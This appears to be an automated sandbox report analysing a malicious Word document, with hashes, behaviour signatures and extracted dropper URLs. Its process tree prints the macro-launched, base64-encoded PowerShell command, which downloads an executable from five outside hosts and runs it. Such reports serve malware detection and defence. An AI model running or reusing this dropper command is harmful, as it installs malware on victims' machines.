Analysis

  • max time kernel
    106s
  • max time network
    69s
  • platform
    windows7_x64
  • resource
    win7-20220331-en
  • submitted
    11-04-2022 03:36

General

  • Target

    wipufccj.doc

  • Size

    169KB

  • MD5

    9bcd7831593b18eb2fc20abb950776e0

  • SHA1

    94fce0e45271cd1dc5ff594f886146c88b5bdf75

  • SHA256

    2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8

  • SHA512

    ce5e923278b315e334274b0b1f9434aaa2851135fb0fb4f147b8e123da1f595e50a70fc47079f8f3c8c5c6a43f9b5b04a5dbf799f29491bb73d716304892dfdc

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://sampling-group.com/J0Eubtq06/

exe.dropper

http://www.weddingsday.co.uk/docs/1oYncTNHDu/

exe.dropper

http://sasystemsuk.com/recruit/sl979/

exe.dropper

http://wellparts.net/cgi-bin/qAj081/

exe.dropper

http://volkanakbalik.com/_inc/2W/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\wipufccj.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABHAEQAWgBBAFoAeABwAGgAPQAnAFAATABKAFMAUQBtAGIAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABDAHUAUgBpAHQAWQBQAGAAUgBvAHQAbwBjAGAATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQATgBXAEIATABGAHoAcgBnACAAPQAgACcAOAA0ADgAJwA7ACQAWgBFAEgARwBMAHQAbAB3AD0AJwBSAEsAWQBBAEkAeAB5AHcAJwA7ACQAWgBVAEMASwBYAGQAaQBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAFcAQgBMAEYAegByAGcAKwAnAC4AZQB4AGUAJwA7ACQAWgBWAEYAVQBRAHoAdAB1AD0AJwBWAEYATwBKAEsAZABhAGcAJwA7ACQARABZAFQAVgBNAHMAdQBxAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABpAGUAbgBUADsAJABKAEMASwBQAFEAegB6AHMAPQAnAGgAdAB0AHAAOgAvAC8AcwBhAG0AcABsAGkAbgBnAC0AZwByAG8AdQBwAC4AYwBvAG0ALwBKADAARQB1AGIAdABxADAANgAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHcAZQBkAGQAaQBuAGcAcwBkAGEAeQAuAGMAbwAuAHUAawAvAGQAbwBjAHMALwAxAG8AWQBuAGMAVABOAEgARAB1AC8AKgBoAHQAdABwADoALwAvAHMAYQBzAHkAcwB0AGUAbQBzAHUAawAuAGMAbwBtAC8AcgBlAGMAcgB1AGkAdAAvAHMAbAA5ADcAOQAvACoAaAB0AHQAcAA6AC8ALwB3AGUAbABsAHAAYQByAHQAcwAuAG4AZQB0AC8AYwBnAGkALQBiAGkAbgAvAHEAQQBqADAAOAAxAC8AKgBoAHQAdABwADoALwAvAHYAbwBsAGsAYQBuAGEAawBiAGEAbABpAGsALgBjAG8AbQAvAF8AaQBuAGMALwAyAFcALwAnAC4AIgBzAHAAYABMAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFkAVwBPAEgATgBiAHYAcAA9ACcAUgBLAEIAVQBTAHEAagB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABDAFAAWABSAE8AYQBlAHoAIABpAG4AIAAkAEoAQwBLAFAAUQB6AHoAcwApAHsAdAByAHkAewAkAEQAWQBUAFYATQBzAHUAcQAuACIAZABPAGAAdwBOAEwATwBhAGAAZABGAEkATABFACIAKAAkAEMAUABYAFIATwBhAGUAegAsACAAJABaAFUAQwBLAFgAZABpAGYAKQA7ACQATABFAE8ASQBOAHEAdgBxAD0AJwBGAEgAWgBWAFoAYgBhAHoAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABaAFUAQwBLAFgAZABpAGYAKQAuACIAbABFAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADkAOQA1ADYAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAGUAYABBAHQARQAiACgAJABaAFUAQwBLAFgAZABpAGYAKQA7ACQAUwBIAEQAWQBBAGYAYgBqAD0AJwBBAE4AWABaAE8AYwBvAGIAJwA7AGIAcgBlAGEAawA7ACQAUQBJAFgATABYAGsAcQBoAD0AJwBXAEwAWgBVAFMAcQBnAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBHAE8AQwBNAGgAegBwAD0AJwBIAEkATABTAEwAegBxAGoAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1832

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1268-88-0x0000000000000000-mapping.dmp
    • memory/1716-70-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-58-0x0000000070B3D000-0x0000000070B48000-memory.dmp
      Filesize

      44KB

    • memory/1716-57-0x00000000754B1000-0x00000000754B3000-memory.dmp
      Filesize

      8KB

    • memory/1716-54-0x00000000720D1000-0x00000000720D4000-memory.dmp
      Filesize

      12KB

    • memory/1716-59-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-74-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-61-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-62-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-64-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-63-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-66-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-65-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-68-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-67-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-69-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-72-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-55-0x000000006FB51000-0x000000006FB53000-memory.dmp
      Filesize

      8KB

    • memory/1716-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1716-60-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-76-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-75-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-73-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-77-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-80-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-79-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-78-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1716-90-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1716-83-0x0000000005540000-0x000000000618A000-memory.dmp
      Filesize

      12.3MB

    • memory/1716-71-0x0000000000725000-0x0000000000729000-memory.dmp
      Filesize

      16KB

    • memory/1832-85-0x0000000002892000-0x0000000002894000-memory.dmp
      Filesize

      8KB

    • memory/1832-86-0x0000000002894000-0x0000000002897000-memory.dmp
      Filesize

      12KB

    • memory/1832-82-0x000007FEF30E0000-0x000007FEF3C3D000-memory.dmp
      Filesize

      11.4MB

    • memory/1832-87-0x000000000289B000-0x00000000028BA000-memory.dmp
      Filesize

      124KB

    • memory/1832-84-0x0000000002890000-0x0000000002892000-memory.dmp
      Filesize

      8KB

    • memory/1832-81-0x000007FEFB5E1000-0x000007FEFB5E3000-memory.dmp
      Filesize

      8KB